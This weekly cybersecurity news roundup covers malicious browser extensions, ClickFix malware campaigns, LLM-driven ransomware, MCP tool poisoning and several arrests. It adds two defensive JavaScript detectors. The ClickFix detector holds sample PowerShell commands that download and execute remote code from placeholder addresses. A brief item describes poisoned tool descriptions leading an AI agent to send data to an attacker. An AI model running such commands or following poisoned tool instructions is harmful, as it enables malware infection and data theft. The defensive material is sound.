Weekly Cybersecurity Roundup Explores How Trust Became Cybercriminals’ Biggest Weapon
Defenders intensified disruption efforts through browser extension removals, cybercrime arrests, and infrastructure takedowns targeting networks built on hijacked home devices.
Impersonation remained a dominant tactic as fake Perplexity AI browser extensions and counterfeit verification pages lured users into malware infections.
Microsoft Removes 119 Malicious Edge Extensions Hiding Malware in Images and Fonts
Microsoft removed 119 malicious Edge browser extensions linked to the StegoAd campaign after finding they concealed payloads inside image and font files. The extensions used steganography, polymorphism, delayed activation, and remote code execution backdoors to evade review and detection. The campaign had two main goals: stealing credentials from Google, WordPress, and CMS login pages, and generating revenue through ad injection, search affiliate hijacking, and shopping commission fraud.
Fake Perplexity AI Browser Extension Hijacks Searches Through Typosquatted Domain
A malicious Chromium extension masquerading as Perplexity AI intercepted browser searches by impersonating the popular AI service through a typosquatted domain, perplexity-ai[.]online. Microsoft Threat Intelligence found that the extension abused the Manifest Version 3 (MV3) declarativeNetRequest (DNR) API to capture Omnibox queries and search suggestions before quietly forwarding users to legitimate search results, which made the activity hard to notice. Its server-side code logged incoming requests, including search terms and HTTP headers, while a fake onboarding page made the extension appear authentic and reduced suspicion. Google removed the extension after Microsoft disclosed the findings.
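The mechanism above is reviewable from the extension package itself, because MV3 DNR rules are static JSON shipped with the extension. The following is an added example, not Microsoft's analysis tooling and not the extension's own files: it audits a manifest and its DNR ruleset for redirect rules that match search traffic and send it to a host outside the extension. The manifest, the four rules, and the benign hosts are constructed for illustration; perplexity-ai[.]online is the domain named in the report.

```javascript
// Added example (not Microsoft's code nor the extension's own): audit a
// Manifest V3 extension's declarativeNetRequest ruleset for redirect rules
// that capture search traffic and send it to an external host.
// SAMPLE_MANIFEST and SAMPLE_RULES below are constructed for this example.

// Search endpoints a query-hijacking rule would have to match on.
const SEARCH_PATTERNS = [/google\.[a-z]+/i, /bing\.com/i, /duckduckgo\.com/i, /search\.yahoo\.com/i, /perplexity\.ai\b/i];

function conditionText(cond) {
  // A DNR condition matches via urlFilter, regexFilter or requestDomains;
  // regexFilter escapes dots, so drop backslashes before pattern matching.
  const c = cond || {};
  return [c.urlFilter, c.regexFilter, ...(c.requestDomains || [])].filter(Boolean).join(' ').replace(/\\/g, '');
}

function targetsSearch(rule) {
  const text = conditionText(rule.condition);
  return SEARCH_PATTERNS.some((re) => re.test(text));
}

function redirectHost(rule) {
  // Host a redirect action sends the request to, or null when the rule is not
  // a redirect or only points at a page bundled inside the extension.
  if (!rule.action || rule.action.type !== 'redirect') return null;
  const r = rule.action.redirect || {};
  if (r.extensionPath) return null;
  if (r.transform && r.transform.host) return r.transform.host.toLowerCase();
  const raw = r.url || r.regexSubstitution;
  if (!raw) return null;
  try {
    // regexSubstitution may carry \1-style back-references; swap them for a
    // placeholder so the URL parser accepts the string.
    return new URL(raw.replace(/\\\d+/g, 'x')).hostname.toLowerCase();
  } catch {
    return null;
  }
}

function auditRules(rules) {
  // One finding per rule that both matches search traffic and redirects it
  // off the extension, in ruleset order.
  const findings = [];
  for (const rule of rules) {
    const host = redirectHost(rule);
    if (host && targetsSearch(rule)) {
      findings.push({ id: rule.id, host, priority: rule.priority || 1, condition: conditionText(rule.condition) });
    }
  }
  return findings;
}

function manifestRiskFlags(manifest) {
  // Permission combination that lets a ruleset rewrite requests on any site.
  const flags = [];
  if ((manifest.permissions || []).includes('declarativeNetRequestWithHostAccess')) flags.push('declarativeNetRequestWithHostAccess');
  if ((manifest.host_permissions || []).includes('<all_urls>')) flags.push('<all_urls>');
  return flags;
}

// Constructed manifest.json and rules.json (not the real extension's files).
const SAMPLE_MANIFEST = {
  manifest_version: 3,
  name: 'Perplexity AI',
  permissions: ['declarativeNetRequest', 'declarativeNetRequestWithHostAccess'],
  host_permissions: ['<all_urls>'],
  declarative_net_request: { rule_resources: [{ id: 'ruleset_1', enabled: true, path: 'rules.json' }] },
};

const SAMPLE_RULES = [
  // Benign: block a tracking pixel.
  { id: 1, priority: 1, action: { type: 'block' }, condition: { urlFilter: '||tracker.example/pixel', resourceTypes: ['image'] } },
  // Suspicious: rewrite Google searches through the typosquatted host, query preserved.
  { id: 2, priority: 10, action: { type: 'redirect', redirect: { regexSubstitution: 'https://perplexity-ai.online/search?q=\\1' } },
    condition: { regexFilter: '^https://www\\.google\\.com/search\\?q=([^&]*)', resourceTypes: ['main_frame'] } },
  // Benign: send a welcome path to a page bundled with the extension.
  { id: 3, priority: 1, action: { type: 'redirect', redirect: { extensionPath: '/onboarding.html' } },
    condition: { urlFilter: '||example.com/welcome', resourceTypes: ['main_frame'] } },
  // Suspicious: route Bing search and suggestion requests to the same host via a URL transform.
  { id: 4, priority: 10, action: { type: 'redirect', redirect: { transform: { host: 'perplexity-ai.online' } } },
    condition: { requestDomains: ['www.bing.com'], urlFilter: '/search', resourceTypes: ['main_frame', 'xmlhttprequest'] } },
];

console.log(JSON.stringify({ flags: manifestRiskFlags(SAMPLE_MANIFEST), findings: auditRules(SAMPLE_RULES) }, null, 2));
```

Run it against an unpacked extension by loading manifest.json and each file listed under `declarative_net_request.rule_resources`. A redirect host that is not the domain the extension's branding claims to represent is the signal to act on; the server-side request logging the report describes is invisible to this kind of static check, so treat the audit as a triage step rather than a verdict.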
Fake Google and Cloudflare Verification Pages Push StealC and Other Malware
Active ClickFix campaigns are using fake Google and Cloudflare verification pages to trick Windows users into copying and running malicious PowerShell commands. Malwarebytes identified several payloads tied to the activity, including HijackLoader, StealC, Remus, Amatera Stealer, CastleLoader, NetSupport, a Rust-based stealer, and a newly documented loader called ResiLoader. In one infection chain, ResiLoader was delivered through a trojanized version of the Franz messaging app and used to disable security tools before deploying StealC. The lures imitate familiar verification or troubleshooting prompts, including CAPTCHA checks, Google Meet audio fixes, and Google sign-in authorization, while the delivery paths keep shifting across compromised websites, Cloudflare Pages, fake QR code generators, and direct IP-based payload hosting.
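Because every ClickFix variant ends with the victim pasting a command into the Run dialog or a terminal, the reliable place to catch it is process creation rather than the lure page. The following is an added example, not Malwarebytes' or any vendor's detection logic: it scores constructed process-creation events (in the shape of Sysmon Event ID 1 or Security 4688 fields) for a shell spawned by explorer.exe whose command line hides its window, fetches and evaluates remote code, carries an encoded command, or still contains the CAPTCHA lure text the page pasted along with the command. The events, IP addresses, weights and threshold are all assumptions made for this example.

```javascript
// Added example (not vendor detection code): score Windows process-creation
// events for the ClickFix pattern. Events, hosts, weights and THRESHOLD are
// constructed assumptions, not values from the report.

const THRESHOLD = 5;
const SHELLS = new Set(['powershell.exe', 'pwsh.exe', 'cmd.exe', 'mshta.exe', 'wscript.exe']);

const INDICATORS = [
  { id: 'hidden-window', weight: 1, re: /-w(?:indowstyle)?\s+hidden/i },
  { id: 'bypass-flags', weight: 1, re: /-(?:ep|executionpolicy)\s+bypass|-nop\b|-noprofile\b/i },
  { id: 'download', weight: 2, re: /\b(?:irm|iwr|invoke-restmethod|invoke-webrequest|downloadstring|downloadfile|curl)\b/i },
  { id: 'eval', weight: 2, re: /\b(?:iex|invoke-expression)\b/i },
  { id: 'remote-url', weight: 1, re: /\bhttps?:\/\/\S+/i },
  { id: 'lure-text', weight: 2, re: /not a robot|captcha|verification|verify you are human|cloudflare|✅/i },
];

// -e / -ec / -enc / -EncodedCommand followed by a base64 blob.
const ENCODED = /-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]{16,})/i;

function basename(p) { return String(p || '').split(/[\\/]/).pop().toLowerCase(); }

function decodeEncodedCommand(cmdline) {
  // -EncodedCommand carries a base64 UTF-16LE script; decode it so the
  // indicators are matched against what actually runs, not the wrapper.
  const m = cmdline.match(ENCODED);
  if (!m) return null;
  try { return Buffer.from(m[1], 'base64').toString('utf16le'); } catch { return null; }
}

function scoreEvent(ev) {
  const reasons = [];
  let score = 0;
  if (basename(ev.parentImage) === 'explorer.exe' && SHELLS.has(basename(ev.image))) {
    score += 1; reasons.push('shell-from-explorer');   // Run dialog / pasted command path
  }
  const decoded = decodeEncodedCommand(ev.cmdline);
  if (decoded !== null) { score += 1; reasons.push('encoded-command'); }
  const text = decoded ? ev.cmdline + ' ' + decoded : ev.cmdline;
  for (const { id, weight, re } of INDICATORS) {
    if (re.test(text)) { score += weight; reasons.push(id); }
  }
  return { id: ev.id, score, flagged: score >= THRESHOLD, reasons, decoded };
}

function scanEvents(events) { return events.map(scoreEvent); }

// Constructed sample events; 203.0.113.10 and 198.51.100.7 are documentation addresses.
const PS = 'C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe';
const encodedInner = "Invoke-WebRequest 'http://198.51.100.7/f.hta' -OutFile $env:TEMP\\f.hta; Start-Process mshta $env:TEMP\\f.hta";
const SAMPLE_EVENTS = [
  // Classic ClickFix: hidden window, remote fetch piped to iex, lure text left in the comment.
  { id: 1, image: PS, parentImage: 'C:\\Windows\\explorer.exe',
    cmdline: 'powershell.exe -w hidden -c "irm https://203.0.113.10/v.txt | iex" # ✅ \'I am not a robot - reCAPTCHA Verification ID: 7812\'' },
  // Encoded variant: the download only shows up after decoding.
  { id: 2, image: PS, parentImage: 'C:\\Windows\\explorer.exe',
    cmdline: 'powershell.exe -NoProfile -ExecutionPolicy Bypass -EncodedCommand ' + Buffer.from(encodedInner, 'utf16le').toString('base64') },
  // Benign: scheduled task running a local script.
  { id: 3, image: PS, parentImage: 'C:\\Windows\\System32\\svchost.exe', cmdline: 'powershell.exe -NoProfile -File C:\\Scripts\\backup.ps1' },
  // Benign: a user opening an interactive shell from the Start menu.
  { id: 4, image: PS, parentImage: 'C:\\Windows\\explorer.exe', cmdline: '"' + PS + '"' },
];

console.log(JSON.stringify(scanEvents(SAMPLE_EVENTS), null, 2));
```

The weights are deliberately additive so that a single feature (an interactive shell from explorer.exe, or a download cmdlet in an admin script) never fires on its own; tune the threshold against your own telemetry before alerting. When an event does fire, the Run dialog history under the user's RunMRU registry key and the browser history around the same timestamp usually confirm which lure page the command came from.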
Agentic Ransomware Used LLM-Generated Code To Destroy 1,342 Nacos Configurations
Sysdig researchers assessed JADEPUFFER as the first documented case of agentic ransomware, an LLM-driven operation chaining Langflow exploitation, credential harvesting, and database destruction. Initial access came through CVE-2025-3248 in Langflow. The payloads were self-narrating, corrected failed steps within seconds, and used natural-language reasoning to prioritize targets; in one case the operation moved from a failed login to a working corrective payload in 31 seconds. The ransomware encrypted all 1,342 Nacos configuration items with an ephemeral AES key that was printed once but never stored or transmitted, making recovery impossible even if the ransom was paid.
MCP Tool Poisoning Lets Attackers Redirect AI Agents to Steal Data
Microsoft has detailed a new attack technique called Model Context Protocol (MCP) tool poisoning, in which attackers manipulate AI tool descriptions to influence AI agents into performing unauthorized actions, including data exfiltration. The technique targets AI agents capable of taking actions rather than simply answering questions, with Microsoft demonstrating how a Copilot Studio agent handling vendor invoices could be tricked into sending sensitive information to an attacker-controlled endpoint after a routine user request. Instead of compromising the AI model itself, the attack alters tool metadata that agents rely on to determine which actions to perform, making the malicious instructions appear trustworthy.
Suspected Scattered Spider Member Extradited to the U.S. After Finland Arrest
Peter Stokes, 19, a dual citizen of the U.S. and Estonia, was extradited to the United States after his April arrest in Finland and now faces federal conspiracy, computer intrusion, and fraud charges in the Northern District of Illinois. The Justice Department said the criminal complaint links him to Scattered Spider, also tracked as Octo Tempest, UNC3944, and 0ktapus, a group accused of using fraudulent access tactics to breach employee accounts, steal or encrypt data, and extort victims. U.S. officials said Scattered Spider has been tied to more than 100 network intrusions, over $100 million in ransom payments, and millions more in damages.
ARToken Expands Phishing Into a Full Business Email Compromise Platform
Cisco Talos uncovered ARToken, a platform that extends beyond phishing kits into a full business email compromise (BEC) toolset, with capabilities such as inbox rule manipulation. Linked to the EvilTokens phishing-as-a-service operation, ARToken employs a seven-layer anti-analysis system to hinder detection. Researchers found it uses highly targeted phishing lures that impersonate real vendor relationships, including invoice requests sent between legitimate business contacts rather than from fabricated senders. The platform has incorporated AI into its phishing, and EvilTokens activity reportedly surged 1,380% early this year compared with the same period last year.
AdaptHealth Confirms Material Breach After Contractor Session Is Hijacked
AdaptHealth disclosed a material cybersecurity incident after a successful social engineering attack compromised a third-party contractor's user session, allowing a threat actor to access cloud-based business applications. The attacker exfiltrated data, including a stored insurance billing password file, and accessed external electronic health record (EHR) portals. The affected information includes patient personally identifiable information (PII) and protected health information (PHI), although the company said Social Security numbers, payment card data, and financial account information were not stored in the impacted systems.
NetNut Proxy Network Tied to Popa Botnet Disrupted over Hijacked Home Devices
Google Threat Intelligence Group observed 316 threat clusters using suspected NetNut exit nodes in one week in June 2026 to hide unauthorized access attempts against victim environments. The network is estimated to include at least 2 million hijacked home devices worldwide, including smart TVs and streaming boxes enrolled through SDKs. Google disabled accounts and services used for command-and-control, shared technical intelligence with law enforcement and industry partners, and updated Google Play Protect to warn users about apps containing NetNut SDKs. The risk extends beyond NetNut because several residential proxy brands may be white-labeling the same network, meaning parts of the ecosystem may continue operating through resellers or competing providers.
Project Medusa Targets Encrypted Networks Behind Drug-Facilitated Sexual Abuse
Europol launched Project Medusa to dismantle encrypted online communities that enable drug-facilitated sexual assault (DFSA). Perpetrators use closed forums and messaging platforms to exchange abuse techniques, trade prescription drugs and narcotics, share exploitative images and videos, and reinforce misogynistic narratives. The project is led by Germany and the United Kingdom and includes cross-border victim identification, intelligence sharing, dark web analysis, IP mapping, and a dedicated database to help identify and remove abusive content. Authorities also plan to use image analysis tools to support victim identification and strengthen investigations across jurisdictions.
The Expanding Abuse of Trust
Whether exploiting familiar software, trusted identities, or personal relationships, attackers seek the paths people least expect. Beyond cybercrime, Europol's Project Medusa highlighted another battle against the abuse of trust, targeting criminal networks that enable drug-facilitated sexual abuse by partners, relatives, friends, and other close acquaintances.